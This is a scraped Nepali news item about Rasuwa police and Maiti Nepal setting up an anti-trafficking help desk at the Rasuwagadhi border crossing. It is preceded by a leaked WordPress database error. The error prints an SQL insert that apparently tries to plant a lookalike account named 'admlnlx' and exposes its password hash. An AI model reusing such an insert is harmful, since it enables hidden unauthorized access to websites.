WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkFMVC/TngOiAJWnfeskvxscmTLA37/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:05:58', '', 'admlnlx', 'admlnlx')
रसुवा, माघ २९ –
मानव बेचबिखन तथा ओसारपसार नियन्त्रणका लागि रसुवागढी नाकामा हेल्प डेक्स स्थापना गरिने भएको छ ।
चीनसँगको एक मात्र व्यापारीक नाका रसुवागढीबाट हुनसक्ने मानव बेचबिखन तथा ओसारपसारलाई ध्यानमा राख्दै जिल्ला प्रहरी कार्यालय रसुवाले हेल्प डेक्स स्थापना गर्न लागेको हो ।
रसुवाका प्रहरी नायव उपरीक्षक फणिन्द्र प्रसाईका अनुसार चीनको केरुङतर्फ हुनसक्ने बेचबिखन नियन्त्रणको बारेमा आवश्यक जानकारी दिनका लागि हेल्प डेक्सको स्थापना गर्न लागिएको हो । माइती नेपालको सहयोगमा स्थापना गर्न लागिएको हेल्प डेक्स केही समयमा नै सञ्चालनमा आउने प्रसाईले बताउनुभयो ।